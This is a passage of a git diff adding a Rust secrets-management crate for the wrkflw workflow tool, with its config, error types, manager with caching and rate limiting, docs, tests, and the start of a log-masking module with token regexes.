||||
let mut masker = SecretMasker::new();
|
||||
|
||||
// Add many secrets
|
||||
for i in 0..100 {
|
||||
masker.add_secret(format!("secret_{}", i));
|
||||
}
|
||||
|
||||
let text = "This text contains secret_50 and secret_75 but not others.";
|
||||
|
||||
c.bench_function("many_secrets", |b| b.iter(|| masker.mask(black_box(text))));
|
||||
}
|
||||
|
||||
fn bench_contains_secrets(c: &mut Criterion) {
|
||||
let mut masker = SecretMasker::new();
|
||||
masker.add_secret("password123");
|
||||
masker.add_secret("api_key_abcdef123456");
|
||||
|
||||
let text_with_secrets = "The password is password123";
|
||||
let text_without_secrets = "Just some normal text";
|
||||
let text_with_patterns = "GitHub token: ghp_1234567890123456789012345678901234567890";
|
||||
|
||||
c.bench_function("contains_secrets_with", |b| {
|
||||
b.iter(|| masker.contains_secrets(black_box(text_with_secrets)))
|
||||
});
|
||||
|
||||
c.bench_function("contains_secrets_without", |b| {
|
||||
b.iter(|| masker.contains_secrets(black_box(text_without_secrets)))
|
||||
});
|
||||
|
||||
c.bench_function("contains_secrets_patterns", |b| {
|
||||
b.iter(|| masker.contains_secrets(black_box(text_with_patterns)))
|
||||
});
|
||||
}
|
||||
|
||||
criterion_group!(
|
||||
benches,
|
||||
bench_basic_masking,
|
||||
bench_pattern_masking,
|
||||
bench_large_text_masking,
|
||||
bench_many_secrets,
|
||||
bench_contains_secrets
|
||||
);
|
||||
criterion_main!(benches);
|
||||
203
crates/secrets/src/config.rs
Normal file
203
crates/secrets/src/config.rs
Normal file
@@ -0,0 +1,203 @@
|
||||
use crate::rate_limit::RateLimitConfig;
|
||||
use serde::{Deserialize, Serialize};
|
||||
use std::collections::HashMap;
|
||||
|
||||
/// Configuration for the secrets management system
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
pub struct SecretConfig {
|
||||
/// Default secret provider to use when none is specified
|
||||
pub default_provider: String,
|
||||
|
||||
/// Configuration for each secret provider
|
||||
pub providers: HashMap<String, SecretProviderConfig>,
|
||||
|
||||
/// Whether to enable secret masking in logs
|
||||
pub enable_masking: bool,
|
||||
|
||||
/// Timeout for secret operations in seconds
|
||||
pub timeout_seconds: u64,
|
||||
|
||||
/// Whether to cache secrets for performance
|
||||
pub enable_caching: bool,
|
||||
|
||||
/// Cache TTL in seconds
|
||||
pub cache_ttl_seconds: u64,
|
||||
|
||||
/// Rate limiting configuration
|
||||
#[serde(skip)]
|
||||
pub rate_limit: RateLimitConfig,
|
||||
}
|
||||
|
||||
impl Default for SecretConfig {
|
||||
fn default() -> Self {
|
||||
let mut providers = HashMap::new();
|
||||
|
||||
// Add default environment variable provider
|
||||
providers.insert(
|
||||
"env".to_string(),
|
||||
SecretProviderConfig::Environment { prefix: None },
|
||||
);
|
||||
|
||||
// Add default file provider
|
||||
providers.insert(
|
||||
"file".to_string(),
|
||||
SecretProviderConfig::File {
|
||||
path: "~/.wrkflw/secrets".to_string(),
|
||||
},
|
||||
);
|
||||
|
||||
Self {
|
||||
default_provider: "env".to_string(),
|
||||
providers,
|
||||
enable_masking: true,
|
||||
timeout_seconds: 30,
|
||||
enable_caching: true,
|
||||
cache_ttl_seconds: 300, // 5 minutes
|
||||
rate_limit: RateLimitConfig::default(),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Configuration for different types of secret providers
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
#[serde(tag = "type", rename_all = "snake_case")]
|
||||
pub enum SecretProviderConfig {
|
||||
/// Environment variables provider
|
||||
Environment {
|
||||
/// Optional prefix for environment variables (e.g., "WRKFLW_SECRET_")
|
||||
prefix: Option<String>,
|
||||
},
|
||||
|
||||
/// File-based secret storage
|
||||
File {
|
||||
/// Path to the secrets file or directory
|
||||
path: String,
|
||||
},
|
||||
// Cloud providers are planned for future implementation
|
||||
// /// HashiCorp Vault provider
|
||||
// #[cfg(feature = "vault-provider")]
|
||||
// Vault {
|
||||
// /// Vault server URL
|
||||
// url: String,
|
||||
// /// Authentication method
|
||||
// auth: VaultAuth,
|
||||
// /// Optional mount path (defaults to "secret")
|
||||
// mount_path: Option<String>,
|
||||
// },
|
||||
|
||||
// /// AWS Secrets Manager provider
|
||||
// #[cfg(feature = "aws-provider")]
|
||||
// AwsSecretsManager {
|
||||
// /// AWS region
|
||||
// region: String,
|
||||
// /// Optional role ARN to assume
|
||||
// role_arn: Option<String>,
|
||||
// },
|
||||
|
||||
// /// Azure Key Vault provider
|
||||
// #[cfg(feature = "azure-provider")]
|
||||
// AzureKeyVault {
|
||||
// /// Key Vault URL
|
||||
// vault_url: String,
|
||||
// /// Authentication method
|
||||
// auth: AzureAuth,
|
||||
// },
|
||||
|
||||
// /// Google Cloud Secret Manager provider
|
||||
// #[cfg(feature = "gcp-provider")]
|
||||
// GcpSecretManager {
|
||||
// /// GCP project ID
|
||||
// project_id: String,
|
||||
// /// Optional service account key file path
|
||||
// key_file: Option<String>,
|
||||
// },
|
||||
}
|
||||
|
||||
// Cloud provider authentication types are planned for future implementation
|
||||
// /// HashiCorp Vault authentication methods
|
||||
// #[cfg(feature = "vault-provider")]
|
||||
// #[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
// #[serde(tag = "method", rename_all = "snake_case")]
|
||||
// pub enum VaultAuth {
|
||||
// /// Token-based authentication
|
||||
// Token { token: String },
|
||||
// /// AppRole authentication
|
||||
// AppRole { role_id: String, secret_id: String },
|
||||
// /// Kubernetes authentication
|
||||
// Kubernetes {
|
||||
// role: String,
|
||||
// jwt_path: Option<String>,
|
||||
// },
|
||||
// }
|
||||
|
||||
// /// Azure authentication methods
|
||||
// #[cfg(feature = "azure-provider")]
|
||||
// #[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
// #[serde(tag = "method", rename_all = "snake_case")]
|
||||
// pub enum AzureAuth {
|
||||
// /// Service Principal authentication
|
||||
// ServicePrincipal {
|
||||
// client_id: String,
|
||||
// client_secret: String,
|
||||
// tenant_id: String,
|
||||
// },
|
||||
// /// Managed Identity authentication
|
||||
// ManagedIdentity,
|
||||
// /// Azure CLI authentication
|
||||
// AzureCli,
|
||||
// }
|
||||
|
||||
impl SecretConfig {
|
||||
/// Load configuration from a file
|
||||
pub fn from_file(path: &str) -> crate::SecretResult<Self> {
|
||||
let content = std::fs::read_to_string(path)?;
|
||||
|
||||
if path.ends_with(".json") {
|
||||
Ok(serde_json::from_str(&content)?)
|
||||
} else if path.ends_with(".yml") || path.ends_with(".yaml") {
|
||||
Ok(serde_yaml::from_str(&content)?)
|
||||
} else {
|
||||
Err(crate::SecretError::invalid_config(
|
||||
"Unsupported config file format. Use .json, .yml, or .yaml",
|
||||
))
|
||||
}
|
||||
}
|
||||
|
||||
/// Save configuration to a file
|
||||
pub fn to_file(&self, path: &str) -> crate::SecretResult<()> {
|
||||
let content = if path.ends_with(".json") {
|
||||
serde_json::to_string_pretty(self)?
|
||||
} else if path.ends_with(".yml") || path.ends_with(".yaml") {
|
||||
serde_yaml::to_string(self)?
|
||||
} else {
|
||||
return Err(crate::SecretError::invalid_config(
|
||||
"Unsupported config file format. Use .json, .yml, or .yaml",
|
||||
));
|
||||
};
|
||||
|
||||
std::fs::write(path, content)?;
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Load configuration from environment variables
|
||||
pub fn from_env() -> Self {
|
||||
let mut config = Self::default();
|
||||
|
||||
// Override default provider if specified
|
||||
if let Ok(provider) = std::env::var("WRKFLW_DEFAULT_SECRET_PROVIDER") {
|
||||
config.default_provider = provider;
|
||||
}
|
||||
|
||||
// Override masking setting
|
||||
if let Ok(masking) = std::env::var("WRKFLW_SECRET_MASKING") {
|
||||
config.enable_masking = masking.parse().unwrap_or(true);
|
||||
}
|
||||
|
||||
// Override timeout
|
||||
if let Ok(timeout) = std::env::var("WRKFLW_SECRET_TIMEOUT") {
|
||||
config.timeout_seconds = timeout.parse().unwrap_or(30);
|
||||
}
|
||||
|
||||
config
|
||||
}
|
||||
}
|
||||
88
crates/secrets/src/error.rs
Normal file
88
crates/secrets/src/error.rs
Normal file
@@ -0,0 +1,88 @@
|
||||
use thiserror::Error;
|
||||
|
||||
/// Result type for secret operations
|
||||
pub type SecretResult<T> = Result<T, SecretError>;
|
||||
|
||||
/// Errors that can occur during secret operations
|
||||
#[derive(Error, Debug)]
|
||||
pub enum SecretError {
|
||||
#[error("Secret not found: {name}")]
|
||||
NotFound { name: String },
|
||||
|
||||
#[error("Secret provider '{provider}' not found")]
|
||||
ProviderNotFound { provider: String },
|
||||
|
||||
#[error("Authentication failed for provider '{provider}': {reason}")]
|
||||
AuthenticationFailed { provider: String, reason: String },
|
||||
|
||||
#[error("Network error accessing secret provider: {0}")]
|
||||
NetworkError(String),
|
||||
|
||||
#[error("Invalid secret configuration: {0}")]
|
||||
InvalidConfig(String),
|
||||
|
||||
#[error("Encryption error: {0}")]
|
||||
EncryptionError(String),
|
||||
|
||||
#[error("IO error: {0}")]
|
||||
IoError(#[from] std::io::Error),
|
||||
|
||||
#[error("JSON parsing error: {0}")]
|
||||
JsonError(#[from] serde_json::Error),
|
||||
|
||||
#[error("YAML parsing error: {0}")]
|
||||
YamlError(#[from] serde_yaml::Error),
|
||||
|
||||
#[error("Invalid secret value format: {0}")]
|
||||
InvalidFormat(String),
|
||||
|
||||
#[error("Secret operation timeout")]
|
||||
Timeout,
|
||||
|
||||
#[error("Permission denied accessing secret: {name}")]
|
||||
PermissionDenied { name: String },
|
||||
|
||||
#[error("Internal error: {0}")]
|
||||
Internal(String),
|
||||
|
||||
#[error("Invalid secret name: {reason}")]
|
||||
InvalidSecretName { reason: String },
|
||||
|
||||
#[error("Secret value too large: {size} bytes (max: {max_size} bytes)")]
|
||||
SecretTooLarge { size: usize, max_size: usize },
|
||||
|
||||
#[error("Rate limit exceeded: {0}")]
|
||||
RateLimitExceeded(String),
|
||||
}
|
||||
|
||||
impl SecretError {
|
||||
/// Create a new NotFound error
|
||||
pub fn not_found(name: impl Into<String>) -> Self {
|
||||
Self::NotFound { name: name.into() }
|
||||
}
|
||||
|
||||
/// Create a new ProviderNotFound error
|
||||
pub fn provider_not_found(provider: impl Into<String>) -> Self {
|
||||
Self::ProviderNotFound {
|
||||
provider: provider.into(),
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a new AuthenticationFailed error
|
||||
pub fn auth_failed(provider: impl Into<String>, reason: impl Into<String>) -> Self {
|
||||
Self::AuthenticationFailed {
|
||||
provider: provider.into(),
|
||||
reason: reason.into(),
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a new InvalidConfig error
|
||||
pub fn invalid_config(msg: impl Into<String>) -> Self {
|
||||
Self::InvalidConfig(msg.into())
|
||||
}
|
||||
|
||||
/// Create a new Internal error
|
||||
pub fn internal(msg: impl Into<String>) -> Self {
|
||||
Self::Internal(msg.into())
|
||||
}
|
||||
}
|
||||
247
crates/secrets/src/lib.rs
Normal file
247
crates/secrets/src/lib.rs
Normal file
@@ -0,0 +1,247 @@
|
||||
// Copyright 2024 wrkflw contributors
|
||||
// SPDX-License-Identifier: MIT
|
||||
|
||||
//! # wrkflw-secrets
|
||||
//!
|
||||
//! Comprehensive secrets management for wrkflw workflow execution.
|
||||
//! Supports multiple secret providers and secure handling throughout the execution pipeline.
|
||||
//!
|
||||
//! ## Features
|
||||
//!
|
||||
//! - **Multiple Secret Providers**: Environment variables, file-based storage, with extensibility for cloud providers
|
||||
//! - **Secret Substitution**: GitHub Actions-style secret references (`${{ secrets.SECRET_NAME }}`)
|
||||
//! - **Automatic Masking**: Intelligent secret detection and masking in logs and output
|
||||
//! - **Rate Limiting**: Built-in protection against secret access abuse
|
||||
//! - **Caching**: Configurable caching for improved performance
|
||||
//! - **Input Validation**: Comprehensive validation of secret names and values
|
||||
//! - **Thread Safety**: Full async/await support with thread-safe operations
|
||||
//!
|
||||
//! ## Quick Start
|
||||
//!
|
||||
//! ```rust
|
||||
//! use wrkflw_secrets::{SecretManager, SecretMasker, SecretSubstitution};
|
||||
//!
|
||||
//! #[tokio::main]
|
||||
//! async fn main() -> Result<(), Box<dyn std::error::Error>> {
|
||||
//! // Initialize the secret manager with default configuration
|
||||
//! let manager = SecretManager::default().await?;
|
||||
//!
|
||||
//! // Set an environment variable for testing
|
||||
//! std::env::set_var("API_TOKEN", "secret_api_token_123");
|
||||
//!
|
||||
//! // Retrieve a secret
|
||||
//! let secret = manager.get_secret("API_TOKEN").await?;
|
||||
//! println!("Secret value: {}", secret.value());
|
||||
//!
|
||||
//! // Use secret substitution
|
||||
//! let mut substitution = SecretSubstitution::new(&manager);
|
||||
//! let template = "Using token: ${{ secrets.API_TOKEN }}";
|
||||
//! let resolved = substitution.substitute(template).await?;
|
||||
//! println!("Resolved: {}", resolved);
|
||||
//!
|
||||
//! // Set up secret masking
|
||||
//! let mut masker = SecretMasker::new();
|
||||
//! masker.add_secret("secret_api_token_123");
|
||||
//!
|
||||
//! let log_message = "Failed to authenticate with token: secret_api_token_123";
|
||||
//! let masked = masker.mask(log_message);
|
||||
//! println!("Masked: {}", masked); // Will show: "Failed to authenticate with token: se***123"
|
||||
//!
|
||||
//! // Clean up
|
||||
//! std::env::remove_var("API_TOKEN");
|
||||
//! Ok(())
|
||||
//! }
|
||||
//! ```
|
||||
//!
|
||||
//! ## Configuration
|
||||
//!
|
||||
//! ```rust
|
||||
//! use wrkflw_secrets::{SecretConfig, SecretProviderConfig, SecretManager};
|
||||
//! use std::collections::HashMap;
|
||||
//!
|
||||
//! #[tokio::main]
|
||||
//! async fn main() -> Result<(), Box<dyn std::error::Error>> {
|
||||
//! let mut providers = HashMap::new();
|
||||
//!
|
||||
//! // Environment variable provider with prefix
|
||||
//! providers.insert(
|
||||
//! "env".to_string(),
|
||||
//! SecretProviderConfig::Environment {
|
||||
//! prefix: Some("MYAPP_SECRET_".to_string())
|
||||
//! }
|
||||
//! );
|
||||
//!
|
||||
//! // File-based provider
|
||||
//! providers.insert(
|
||||
//! "file".to_string(),
|
||||
//! SecretProviderConfig::File {
|
||||
//! path: "/path/to/secrets.json".to_string()
|
||||
//! }
|
||||
//! );
|
||||
//!
|
||||
//! let config = SecretConfig {
|
||||
//! default_provider: "env".to_string(),
|
||||
//! providers,
|
||||
//! enable_masking: true,
|
||||
//! timeout_seconds: 30,
|
||||
//! enable_caching: true,
|
||||
//! cache_ttl_seconds: 300,
|
||||
//! rate_limit: Default::default(),
|
||||
//! };
|
||||
//!
|
||||
//! let manager = SecretManager::new(config).await?;
|
||||
//! Ok(())
|
||||
//! }
|
||||
//! ```
|
||||
//!
|
||||
//! ## Security Features
|
||||
//!
|
||||
//! ### Input Validation
|
||||
//!
|
||||
//! All secret names and values are validated to prevent injection attacks and ensure compliance
|
||||
//! with naming conventions.
|
||||
//!
|
||||
//! ### Rate Limiting
|
||||
//!
|
||||
//! Built-in rate limiting prevents abuse and denial-of-service attacks on secret providers.
|
||||
//!
|
||||
//! ### Automatic Pattern Detection
|
||||
//!
|
||||
//! The masking system automatically detects and masks common secret patterns:
|
||||
//! - GitHub Personal Access Tokens (`ghp_*`)
|
||||
//! - AWS Access Keys (`AKIA*`)
|
||||
//! - JWT tokens
|
||||
//! - API keys and tokens
|
||||
//!
|
||||
//! ### Memory Safety
|
||||
//!
|
||||
//! Secrets are handled with care to minimize exposure in memory and logs.
|
||||
//!
|
||||
//! ## Provider Support
|
||||
//!
|
||||
//! ### Environment Variables
|
||||
//!
|
||||
//! ```rust
|
||||
//! use wrkflw_secrets::{SecretProviderConfig, SecretManager, SecretConfig};
|
||||
//!
|
||||
//! // With prefix for better security
|
||||
//! let provider = SecretProviderConfig::Environment {
|
||||
//! prefix: Some("MYAPP_".to_string())
|
||||
//! };
|
||||
//! ```
|
||||
//!
|
||||
//! ### File-based Storage
|
||||
//!
|
||||
//! Supports JSON, YAML, and environment file formats:
|
||||
//!
|
||||
//! ```json
|
||||
//! {
|
||||
//! "database_password": "super_secret_password",
|
||||
//! "api_key": "your_api_key_here"
|
||||
//! }
|
||||
//! ```
|
||||
//!
|
||||
//! ```yaml
|
||||
//! database_password: super_secret_password
|
||||
//! api_key: your_api_key_here
|
||||
//! ```
|
||||
//!
|
||||
//! ```bash
|
||||
//! # Environment format
|
||||
//! DATABASE_PASSWORD=super_secret_password
|
||||
//! API_KEY="your_api_key_here"
|
||||
//! ```
|
||||
|
||||
pub mod config;
|
||||
pub mod error;
|
||||
pub mod manager;
|
||||
pub mod masking;
|
||||
pub mod providers;
|
||||
pub mod rate_limit;
|
||||
pub mod storage;
|
||||
pub mod substitution;
|
||||
pub mod validation;
|
||||
|
||||
pub use config::{SecretConfig, SecretProviderConfig};
|
||||
pub use error::{SecretError, SecretResult};
|
||||
pub use manager::SecretManager;
|
||||
pub use masking::SecretMasker;
|
||||
pub use providers::{SecretProvider, SecretValue};
|
||||
pub use substitution::SecretSubstitution;
|
||||
|
||||
/// Re-export commonly used types
|
||||
pub mod prelude {
|
||||
pub use crate::{
|
||||
SecretConfig, SecretError, SecretManager, SecretMasker, SecretProvider, SecretResult,
|
||||
SecretSubstitution, SecretValue,
|
||||
};
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use uuid;
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_basic_secret_management() {
|
||||
let config = SecretConfig::default();
|
||||
let manager = SecretManager::new(config)
|
||||
.await
|
||||
.expect("Failed to create manager");
|
||||
|
||||
// Use a unique test secret name to avoid conflicts
|
||||
let test_secret_name = format!(
|
||||
"TEST_SECRET_{}",
|
||||
uuid::Uuid::new_v4().to_string().replace('-', "_")
|
||||
);
|
||||
std::env::set_var(&test_secret_name, "secret_value");
|
||||
|
||||
let result = manager.get_secret(&test_secret_name).await;
|
||||
assert!(result.is_ok());
|
||||
|
||||
let secret = result.unwrap();
|
||||
assert_eq!(secret.value(), "secret_value");
|
||||
|
||||
std::env::remove_var(&test_secret_name);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_secret_substitution() {
|
||||
let config = SecretConfig::default();
|
||||
let manager = SecretManager::new(config)
|
||||
.await
|
||||
.expect("Failed to create manager");
|
||||
|
||||
// Use a unique test secret name to avoid conflicts
|
||||
let test_secret_name = format!(
|
||||
"GITHUB_TOKEN_{}",
|
||||
uuid::Uuid::new_v4().to_string().replace('-', "_")
|
||||
);
|
||||
std::env::set_var(&test_secret_name, "ghp_test_token");
|
||||
|
||||
let mut substitution = SecretSubstitution::new(&manager);
|
||||
let input = format!("echo 'Token: ${{{{ secrets.{} }}}}'", test_secret_name);
|
||||
|
||||
let result = substitution.substitute(&input).await;
|
||||
assert!(result.is_ok());
|
||||
|
||||
let output = result.unwrap();
|
||||
assert!(output.contains("ghp_test_token"));
|
||||
|
||||
std::env::remove_var(&test_secret_name);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_secret_masking() {
|
||||
let mut masker = SecretMasker::new();
|
||||
masker.add_secret("secret123");
|
||||
masker.add_secret("password456");
|
||||
|
||||
let input = "The secret is secret123 and password is password456";
|
||||
let masked = masker.mask(input);
|
||||
|
||||
assert!(masked.contains("***"));
|
||||
assert!(!masked.contains("secret123"));
|
||||
assert!(!masked.contains("password456"));
|
||||
}
|
||||
}
|
||||
267
crates/secrets/src/manager.rs
Normal file
267
crates/secrets/src/manager.rs
Normal file
@@ -0,0 +1,267 @@
|
||||
use crate::{
|
||||
config::{SecretConfig, SecretProviderConfig},
|
||||
providers::{env::EnvironmentProvider, file::FileProvider, SecretProvider, SecretValue},
|
||||
rate_limit::RateLimiter,
|
||||
validation::{validate_provider_name, validate_secret_name},
|
||||
SecretError, SecretResult,
|
||||
};
|
||||
use std::collections::HashMap;
|
||||
use std::sync::Arc;
|
||||
use tokio::sync::RwLock;
|
||||
|
||||
/// Cached secret entry
|
||||
#[derive(Debug, Clone)]
|
||||
struct CachedSecret {
|
||||
value: SecretValue,
|
||||
expires_at: chrono::DateTime<chrono::Utc>,
|
||||
}
|
||||
|
||||
/// Central secret manager that coordinates multiple providers
|
||||
pub struct SecretManager {
|
||||
config: SecretConfig,
|
||||
providers: HashMap<String, Box<dyn SecretProvider>>,
|
||||
cache: Arc<RwLock<HashMap<String, CachedSecret>>>,
|
||||
rate_limiter: RateLimiter,
|
||||
}
|
||||
|
||||
impl SecretManager {
|
||||
/// Create a new secret manager with the given configuration
|
||||
pub async fn new(config: SecretConfig) -> SecretResult<Self> {
|
||||
let mut providers: HashMap<String, Box<dyn SecretProvider>> = HashMap::new();
|
||||
|
||||
// Initialize providers based on configuration
|
||||
for (name, provider_config) in &config.providers {
|
||||
// Validate provider name
|
||||
validate_provider_name(name)?;
|
||||
|
||||
let provider: Box<dyn SecretProvider> = match provider_config {
|
||||
SecretProviderConfig::Environment { prefix } => {
|
||||
Box::new(EnvironmentProvider::new(prefix.clone()))
|
||||
}
|
||||
SecretProviderConfig::File { path } => Box::new(FileProvider::new(path.clone())),
|
||||
// Cloud providers are planned for future implementation
|
||||
// #[cfg(feature = "vault-provider")]
|
||||
// SecretProviderConfig::Vault { url, auth, mount_path } => {
|
||||
// Box::new(crate::providers::vault::VaultProvider::new(
|
||||
// url.clone(),
|
||||
// auth.clone(),
|
||||
// mount_path.clone(),
|
||||
// ).await?)
|
||||
// }
|
||||
};
|
||||
|
||||
providers.insert(name.clone(), provider);
|
||||
}
|
||||
|
||||
let rate_limiter = RateLimiter::new(config.rate_limit.clone());
|
||||
|
||||
Ok(Self {
|
||||
config,
|
||||
providers,
|
||||
cache: Arc::new(RwLock::new(HashMap::new())),
|
||||
rate_limiter,
|
||||
})
|
||||
}
|
||||
|
||||
/// Create a new secret manager with default configuration
|
||||
pub async fn default() -> SecretResult<Self> {
|
||||
Self::new(SecretConfig::default()).await
|
||||
}
|
||||
|
||||
/// Get a secret by name using the default provider
|
||||
pub async fn get_secret(&self, name: &str) -> SecretResult<SecretValue> {
|
||||
validate_secret_name(name)?;
|
||||
self.get_secret_from_provider(&self.config.default_provider, name)
|
||||
.await
|
||||
}
|
||||
|
||||
/// Get a secret from a specific provider
|
||||
pub async fn get_secret_from_provider(
|
||||
&self,
|
||||
provider_name: &str,
|
||||
name: &str,
|
||||
) -> SecretResult<SecretValue> {
|
||||
validate_provider_name(provider_name)?;
|
||||
validate_secret_name(name)?;
|
||||
|
||||
// Check rate limit
|
||||
let rate_limit_key = format!("{}:{}", provider_name, name);
|
||||
self.rate_limiter.check_rate_limit(&rate_limit_key).await?;
|
||||
|
||||
// Check cache first if caching is enabled
|
||||
if self.config.enable_caching {
|
||||
let cache_key = format!("{}:{}", provider_name, name);
|
||||
|
||||
{
|
||||
let cache = self.cache.read().await;
|
||||
if let Some(cached) = cache.get(&cache_key) {
|
||||
if chrono::Utc::now() < cached.expires_at {
|
||||
return Ok(cached.value.clone());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Get provider
|
||||
let provider = self
|
||||
.providers
|
||||
.get(provider_name)
|
||||
.ok_or_else(|| SecretError::provider_not_found(provider_name))?;
|
||||
|
||||
// Get secret from provider
|
||||
let secret = provider.get_secret(name).await?;
|
||||
|
||||
// Cache the result if caching is enabled
|
||||
if self.config.enable_caching {
|
||||
let cache_key = format!("{}:{}", provider_name, name);
|
||||
let expires_at = chrono::Utc::now()
|
||||
+ chrono::Duration::seconds(self.config.cache_ttl_seconds as i64);
|
||||
|
||||
let cached_secret = CachedSecret {
|
||||
value: secret.clone(),
|
||||
expires_at,
|
||||
};
|
||||
|
||||
let mut cache = self.cache.write().await;
|
||||
cache.insert(cache_key, cached_secret);
|
||||
}
|
||||
|
||||
Ok(secret)
|
||||
}
|
||||
|
||||
/// List all available secrets from all providers
|
||||
pub async fn list_all_secrets(&self) -> SecretResult<HashMap<String, Vec<String>>> {
|
||||
let mut all_secrets = HashMap::new();
|
||||
|
||||
for (provider_name, provider) in &self.providers {
|
||||
match provider.list_secrets().await {
|
||||
Ok(secrets) => {
|
||||
all_secrets.insert(provider_name.clone(), secrets);
|
||||
}
|
||||
Err(_) => {
|
||||
// Some providers may not support listing, ignore errors
|
||||
all_secrets.insert(provider_name.clone(), vec![]);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Ok(all_secrets)
|
||||
}
|
||||
|
||||
/// Check health of all providers
|
||||
pub async fn health_check(&self) -> HashMap<String, SecretResult<()>> {
|
||||
let mut results = HashMap::new();
|
||||
|
||||
for (provider_name, provider) in &self.providers {
|
||||
let result = provider.health_check().await;
|
||||
results.insert(provider_name.clone(), result);
|
||||
}
|
||||
|
||||
results
|
||||
}
|
||||
|
||||
/// Clear the cache
|
||||
pub async fn clear_cache(&self) {
|
||||
let mut cache = self.cache.write().await;
|
||||
cache.clear();
|
||||
}
|
||||
|
||||
/// Get configuration
|
||||
pub fn config(&self) -> &SecretConfig {
|
||||
&self.config
|
||||
}
|
||||
|
||||
/// Check if a provider exists
|
||||
pub fn has_provider(&self, name: &str) -> bool {
|
||||
self.providers.contains_key(name)
|
||||
}
|
||||
|
||||
/// Get provider names
|
||||
pub fn provider_names(&self) -> Vec<String> {
|
||||
self.providers.keys().cloned().collect()
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_secret_manager_creation() {
|
||||
let config = SecretConfig::default();
|
||||
let manager = SecretManager::new(config).await;
|
||||
assert!(manager.is_ok());
|
||||
|
||||
let manager = manager.unwrap();
|
||||
assert!(manager.has_provider("env"));
|
||||
assert!(manager.has_provider("file"));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_secret_manager_environment_provider() {
|
||||
// Use unique secret name to avoid test conflicts
|
||||
let test_secret_name = format!("TEST_SECRET_MANAGER_{}", std::process::id());
|
||||
std::env::set_var(&test_secret_name, "manager_test_value");
|
||||
|
||||
let manager = SecretManager::default().await.unwrap();
|
||||
let result = manager
|
||||
.get_secret_from_provider("env", &test_secret_name)
|
||||
.await;
|
||||
|
||||
assert!(result.is_ok());
|
||||
let secret = result.unwrap();
|
||||
assert_eq!(secret.value(), "manager_test_value");
|
||||
|
||||
std::env::remove_var(&test_secret_name);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_secret_manager_caching() {
|
||||
// Use unique secret name to avoid test conflicts
|
||||
let test_secret_name = format!("CACHE_TEST_SECRET_{}", std::process::id());
|
||||
std::env::set_var(&test_secret_name, "cached_value");
|
||||
|
||||
let config = SecretConfig {
|
||||
enable_caching: true,
|
||||
cache_ttl_seconds: 60, // 1 minute
|
||||
..Default::default()
|
||||
};
|
||||
|
||||
let manager = SecretManager::new(config).await.unwrap();
|
||||
|
||||
// First call should hit the provider
|
||||
let result1 = manager
|
||||
.get_secret_from_provider("env", &test_secret_name)
|
||||
.await;
|
||||
assert!(result1.is_ok());
|
||||
|
||||
// Remove the environment variable
|
||||
std::env::remove_var(&test_secret_name);
|
||||
|
||||
// Second call should hit the cache and still return the value
|
||||
let result2 = manager
|
||||
.get_secret_from_provider("env", &test_secret_name)
|
||||
.await;
|
||||
assert!(result2.is_ok());
|
||||
assert_eq!(result2.unwrap().value(), "cached_value");
|
||||
|
||||
// Clear cache and try again - should fail now
|
||||
manager.clear_cache().await;
|
||||
let result3 = manager
|
||||
.get_secret_from_provider("env", &test_secret_name)
|
||||
.await;
|
||||
assert!(result3.is_err());
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_secret_manager_health_check() {
|
||||
let manager = SecretManager::default().await.unwrap();
|
||||
let health_results = manager.health_check().await;
|
||||
|
||||
assert!(health_results.contains_key("env"));
|
||||
assert!(health_results.contains_key("file"));
|
||||
|
||||
// Environment provider should be healthy
|
||||
assert!(health_results.get("env").unwrap().is_ok());
|
||||
}
|
||||
}
|
||||
348
crates/secrets/src/masking.rs
Normal file
348
crates/secrets/src/masking.rs
Normal file
@@ -0,0 +1,348 @@
|
||||
use regex::Regex;
|
||||
use std::collections::{HashMap, HashSet};
|
||||
use std::sync::OnceLock;
|
||||
|
||||
/// Compiled regex patterns for common secret formats
|
||||
struct CompiledPatterns {
|
||||
github_pat: Regex,
|
||||
github_app: Regex,
|
||||
github_oauth: Regex,
|
||||
aws_access_key: Regex,
|
||||
aws_secret: Regex,
|
||||
jwt: Regex,
|
||||
api_key: Regex,
|
||||
}
|
||||
|
||||
impl CompiledPatterns {
|
||||
fn new() -> Self {
|
||||
Self {
|
||||
github_pat: Regex::new(r"ghp_[a-zA-Z0-9]{36}").unwrap(),
|
||||
github_app: Regex::new(r"ghs_[a-zA-Z0-9]{36}").unwrap(),
|
||||
github_oauth: Regex::new(r"gho_[a-zA-Z0-9]{36}").unwrap(),
|
||||
aws_access_key: Regex::new(r"AKIA[0-9A-Z]{16}").unwrap(),
|
||||
aws_secret: Regex::new(r"[A-Za-z0-9/+=]{40}").unwrap(),
|
||||
jwt: Regex::new(r"eyJ[a-zA-Z0-9_-]*\.eyJ[a-zA-Z0-9_-]*\.[a-zA-Z0-9_-]*").unwrap(),
|
||||
api_key: Regex::new(r"(?i)(api[_-]?key|token)[\s:=]+[a-zA-Z0-9_-]{16,}").unwrap(),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Global compiled patterns (initialized once)
|
||||
static PATTERNS: OnceLock<CompiledPatterns> = OnceLock::new();
|
||||
|
||||
/// Secret masking utility to prevent secrets from appearing in logs
|
||||
pub struct SecretMasker {
|
||||
secrets: HashSet<String>,
|
||||
secret_cache: HashMap<String, String>, // Cache masked versions
|
||||
mask_char: char,
|
||||
min_length: usize,
|
||||
}
|
||||
|
||||
impl SecretMasker {
|
||||
/// Create a new secret masker
|
||||
